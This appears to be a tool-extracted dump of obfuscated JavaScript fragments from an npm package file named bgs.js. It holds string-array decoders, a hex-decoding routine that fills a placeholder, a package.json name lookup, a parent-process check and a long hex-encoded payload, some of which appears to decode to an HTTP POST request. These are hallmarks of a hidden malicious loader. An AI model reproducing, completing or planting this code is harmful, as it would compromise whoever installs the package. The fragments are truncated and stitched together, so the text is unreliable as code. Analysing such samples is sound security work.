function _0x4cdb = function _0x4cdb(_0x22416d, _0x215052) {
    const _0x5ea562 = _0x3c30();
    return _0x4cdb = function (_0x1d310d, _0x32f2ca) {
        _0x1d310d = _0x1d310d - (0x11ab * 0x2 + -0xbf * 0x1 + -0x21ad);
        let _0x384cf1 = _0x5ea562[_0x1d310d];
        return _0x384cf1;
    }, _0x4cdb(_0x22416d, _0x215052);
}
function (_0x4650cc, _0x5ec6f1) {
    const _0x31c576 = _0x4cdb, _0x3a2f2a = _0x4650cc();
    while (!![]) {
        try {
            const _0x562489 = -parseInt(_0x31c576(0xf9)) / (0x1 * -0x25d9 + 0x1226 + -0x1 * -0x13b4) + -parseInt(_0x31c576(0xee)) / (-0x3f8 + 0x6 * -0x95 + -0x1de * -0x4) + parseInt(_0x31c576(0xf4)) / (0xd21 * 0x1 + 0x17b8 + -0xcd * 0x2e) * (parseInt(_0x31c576(0xed)) / (0x7 * -0x2cf + -0xf98 + -0x2345 * -0x1)) + -parseInt(_0x31c576(0xf8)) / (-0x23 * 0x59 + -0x106b + 0x1c9b) + parseInt(_0x31c576(0xf2)) / (-0x23bc * -0x1 + 0x23b + -0x25f1) * (parseInt(_0x31c576(0xea)) / (-0x249d + 0x152b + -0xf79 * -0x1)) + -parseInt(_0x31c576(0xef)) / (0xb82 + -0x1a52 + 0xed8) * (-parseInt(_0x31c576(0xec)) / (0x295 * -0xd + 0xc6 + 0x20d4)) + parseInt(_0x31c576(0xfa)) / (0x5 * 0x1bd + 0x373 + -0xc1a) * (parseInt(_0x31c576(0xf6)) / (0x2358 + 0x2 * -0x22e + -0x1 * 0x1ef1));
            if (_0x562489 === _0x5ec6f1)
                break;
            else
                _0x3a2f2a['pu...
0xf19 * 0x49 + -0x1 * 0x785c2 + 0x9cb4b * 0x1
function _0x3c30 = function _0x3c30() {
    const _0x2e6f00 = [
        'lSriB',
        '1886410jQVeLA',
        '156278eeqzFs',
        '6838520iKfJML',
        'sslUt',
        '581588phrVil',
        'replace',
        '793197yDDeFz',
        '396czFOIZ',
        '959722htvPFQ',
        '16hqUIVr',
        'from',
        'toString',
        '6eSbcNu',
        'syefY',
        '15189ZvamEJ',
        'cii',
        '11vdPHiy'
    ];
    _0x3c30 = function () {
        return _0x2e6f00;
    };
    return _0x3c30();
}
function xify = function xify(_0x47f2fe, _0x5a0a56) {
    const _0x51386a = _0x4cdb, _0x1ecf55 = {
            'sslUt': function (_0x232d62, _0x14bf43) {
                return _0x232d62 + _0x14bf43;
            },
            'syefY': function (_0xcab3a2, _0x1d5e72) {
                return _0xcab3a2 + _0x1d5e72;
            },
            'lSriB': _0x51386a(0xf5)
        }, _0x3ae7de = Buffer[_0x51386a(0xf0)](_0x5a0a56, _0x1ecf55[_0x51386a(0xfb)]('he', 'x')), _0x3397e6 = _0x3ae7de[_0x51386a(0xf1)](_0x1ecf55[_0x51386a(0xf3)]('as', _0x1ecf55[_0x51386a(0xf7)]));
    return _0x3397e6[_0x51386a(0xeb)](_0x1ecf55[_0x51386a(0xfb)](_0x1ecf55[_0x51386a(0xf3)]('$$', '$$'), '$$'), _0x47f2fe);
}
process.ppid==process.argv[2]
const _0xdcb0c6 = _0x4ce4
function (_0xcffa97, _0x4ebf53) {
    const _0x1d47b0 = _0x4ce4, _0x51aa8d = _0xcffa97();
    while (!![]) {
        try {
            const _0x522299 = -parseInt(_0x1d47b0(0x18b)) / (0x117a + -0x24a7 * 0x1 + -0x5 * -0x3d6) * (parseInt(_0x1d47b0(0x18c)) / (-0x2c * 0x3f + -0x1 * -0x974 + 0x162)) + -parseInt(_0x1d47b0(0x187)) / (0xccf + -0x98 * 0x1a + -0x34 * -0xd) + parseInt(_0x1d47b0(0x185)) / (0xe2e + 0x2230 + 0x1 * -0x305a) + parseInt(_0x1d47b0(0x18a)) / (0x1bdf + 0x129f + 0x1 * -0x2e79) * (-parseInt(_0x1d47b0(0x189)) / (-0xf7 * -0x1a + 0x33 * 0xaf + -0x17 * 0x29b)) + -parseInt(_0x1d47b0(0x18f)) / (-0x1a68 + -0x1200 + 0x2c6f) + parseInt(_0x1d47b0(0x18d)) / (0x20c + 0x13 * 0xdd + -0x126b) * (-parseInt(_0x1d47b0(0x183)) / (0x51 * 0x4 + -0x463 * 0x7 + 0x157 * 0x16)) + -parseInt(_0x1d47b0(0x188)) / (-0xf93 + 0xa81 * 0x2 + -0x565) * (-parseInt(_0x1d47b0(0x184)) / (0x3 * -0x53d + 0x1e9a + -0xed8 * 0x1));
            if (_0x522299 === _0x4ebf53)
                break;
            else
  ...
-0x1 * 0x431dd + 0x893 * 0x6 + 0x6ce13
const pJSON = require(_0xdcb0c6(0x190) + _0xdcb0c6(0x186))
function _0x4ce4 = function _0x4ce4(_0x1c3566, _0x49ac50) {
    const _0x8ef2b1 = _0x4767();
    return _0x4ce4 = function (_0x23d482, _0x2c878f) {
        _0x23d482 = _0x23d482 - (0x86 * 0x31 + 0x18 * 0xac + 0xb * -0x3a9);
        let _0x5b21a1 = _0x8ef2b1[_0x23d482];
        return _0x5b21a1;
    }, _0x4ce4(_0x1c3566, _0x49ac50);
}
function _0x4767 = function _0x4767() {
    const _0x48b85e = [
        './package.',
        '11961BLWAdF',
        '3982gMFoMI',
        '1342912KhjlEv',
        'json',
        '73239LwEymF',
        '20990Pyosll',
        '142764SnQZbb',
        '70VcbMVK',
        '45821rOQkuK',
        '4bZzQFG',
        '1192JJopiy',
        'name',
        '1848994MwSipc'
    ];
    _0x4767 = function () {
        return _0x48b85e;
    };
    return _0x4767();
}
function _0x36ae = function _0x36ae(_0x4078c7, _0x32920c) {
    var _0xc0d834 = _0x326e();
    return _0x36ae = function (_0x18f90c, _0x29b198) {
        _0x18f90c = _0x18f90c - (0x5 * 0x764 + -0x1 * -0x2482 + -0x6 * 0xbfe);
        var _0x3ed070 = _0xc0d834[_0x18f90c];
        return _0x3ed070;
    }, _0x36ae(_0x4078c7, _0x32920c);
}
var _0x131cbb = _0x36ae
function _0x326e = function _0x326e() {
    var _0x5a97f9 = [
        '5b5f307837',
        '633729202b',
        '3078333837',
        '6330303236',
        '657475726e',
        '7831366639',
        '652c0a2020',
        '27504f5354',
        '6562295d28',
        '6263623635',
        '2929202f20',
        '2830786364',
        '7374446174',
        '35203d205f',
        '706c696361',
        '6b4f79273a',
        '3365336220',
        '2020276864',
        '623534272c',
        '3666363927',
        '2028706172',
        '336533625b',
        '30203d3d20',
        '5643272c0a',
        '3932613965',
        '3738203d20',
        '282d307831',
        '656e686578',
        '202020636f',
        '293b0a7d',
        '653133382c',
        '6664285f30',
        '704b767627',
        '285f307833',
        '343129207b',
        '3078333035',
        '205f307835',
        '3078313030',
        '3a205f5f64',
        '27436f6e74',
        '37203d205f',
        '3436665b27',
        '2732714558',
        '3...
function (_0x179e9c, _0x25fcaa) {
    var _0x1c414d = _0x36ae, _0x300ad1 = _0x179e9c();
    while (!![]) {
        try {
            var _0x2bf5f2 = parseInt(_0x1c414d(0x189)) / (0x214a + 0x1fe3 + -0x412c) * (-parseInt(_0x1c414d(0x25f)) / (-0x159c + -0x1d3c + 0x32da)) + parseInt(_0x1c414d(0x3d5)) / (-0x181b + 0x3ce + 0x1450) * (-parseInt(_0x1c414d(0x34d)) / (0x11f9 + -0xf2c + -0x2c9)) + parseInt(_0x1c414d(0x569)) / (-0x1 * 0x32b + 0x295 + -0x1f * -0x5) + -parseInt(_0x1c414d(0x1ad)) / (0x1c23 + -0xf * -0x15d + -0x3090) * (-parseInt(_0x1c414d(0x2b0)) / (0x1525 + -0x2b4 * 0x8 + 0x82)) + -parseInt(_0x1c414d(0x1ba)) / (0x2604 + -0x470 + 0x26 * -0xe2) * (parseInt(_0x1c414d(0x2ac)) / (0xbe * -0x23 + -0x12 * -0x1dd + 0x787 * -0x1)) + parseInt(_0x1c414d(0x343)) / (-0x4a * -0x4f + -0x52 * 0x3d + -0x342) + parseInt(_0x1c414d(0x519)) / (0x1a4f * -0x1 + 0x11 * -0x1f3 + 0x61 * 0x9d);
            if (_0x2bf5f2 === _0x25fcaa)
                break;
            else
                _0x300ad1['push']...
img = _0x131cbb(0x421) + _0x131cbb(0x54c) + _0x131cbb(0x458) + _0x131cbb(0x272) + _0x131cbb(0x38b) + _0x131cbb(0x4d0) + _0x131cbb(0x182) + _0x131cbb(0x470) + _0x131cbb(0x44a) + _0x131cbb(0x284) + _0x131cbb(0x429) + _0x131cbb(0x488) + _0x131cbb(0x1cc) + _0x131cbb(0x18f) + _0x131cbb(0x307) + _0x131cbb(0x219) + _0x131cbb(0x191) + _0x131cbb(0x402) + _0x131cbb(0x27e) + _0x131cbb(0x31c) + _0x131cbb(0x2fb) + _0x131cbb(0x42e) + _0x131cbb(0x456) + _0x131cbb(0x1e4) + _0x131cbb(0x555) + _0x131cbb(0x2ea) + _0x131cbb(0x1cd) + _0x131cbb(0x1cc) + _0x131cbb(0x490) + _0x131cbb(0x49e) + _0x131cbb(0x1b3) + _0x131cbb(0x490) + _0x131cbb(0x4c1) + _0x131cbb(0x22d) + _0x131cbb(0x24c) + _0x131cbb(0x2e5) + _0x131cbb(0x1d2) + _0x131cbb(0x29d) + _0x131cbb(0x2bc) + _0x131cbb(0x564) + _0x131cbb(0x255) + _0x131cbb(0x437) + _0x131cbb(0x379) + _0x131cbb(0x3e0) + _0x131cbb(0x1c0) + _0x131cbb(0x268) + _0x131cbb(0x40f) + _0x131cbb(0x556) + _0x131cbb(0x37c) + _0x131cbb(0x43d) + _0x131cbb(0x2d1) + _0x131cbb(0x526) + _0x...
VMShimScript = package/bgs.js::program:VMShimScript:<init>
function fff = function fff(sandbox) {
  // TODO: This should probably use a symbol
  Object.defineProperty(sandbox, "__isVMShimContext", {
    value: true,
    writable: true,
    configurable: true,
    enumerable: false
  });

  for (const [globalName, globalPropDesc] of jsGlobalEntriesToInstall) {
    const propDesc = { ...globalPropDesc, value: global[globalName] };
    Object.defineProperty(sandbox, globalName, propDesc);
  }

  Object.defineProperty(sandbox, "eval", {
    value(code) {
      return exports.runInContext(code, sandbox);
    },
    writable: true,
    configurable: true,
    enumerable: false
  });
}
